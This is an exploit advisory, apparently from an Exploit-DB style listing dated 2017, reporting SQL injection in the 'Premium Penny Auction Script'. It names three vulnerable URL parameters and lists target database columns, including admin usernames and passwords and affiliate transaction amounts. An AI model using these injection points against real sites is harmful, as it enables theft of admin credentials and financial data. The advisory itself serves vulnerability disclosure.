29 lines
No EOL
891 B
Text
29 lines
No EOL
891 B
Text
# # # # #
|
|
# Exploit Title: Premium Penny Auction Script - SQL Injection
|
|
# Google Dork: N/A
|
|
# Date: 05.04.2017
|
|
# Vendor Homepage: http://bimedia.info/
|
|
# Software: http://bimedia.info/premium-penny-auction-script/
|
|
# Demo: http://pennyauction.clonedemo.com/
|
|
# Version: N/A
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# #ihsansencan
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/allauctions.php?aid=[SQL]
|
|
# http://localhost/[PATH]/news.php?nid=[SQL]
|
|
# http://localhost/[PATH]/productdetails.php?aid=[SQL]&pid=[SQL]
|
|
# admin :id
|
|
# admin :username
|
|
# admin :pass
|
|
# affiliate_transaction :aff_id
|
|
# affiliate_transaction :user_id
|
|
# affiliate_transaction :referer_id
|
|
# affiliate_transaction :amount
|
|
# affiliate_transaction :commission
|
|
# affiliate_transaction :bid_pack_title
|
|
# # # # # |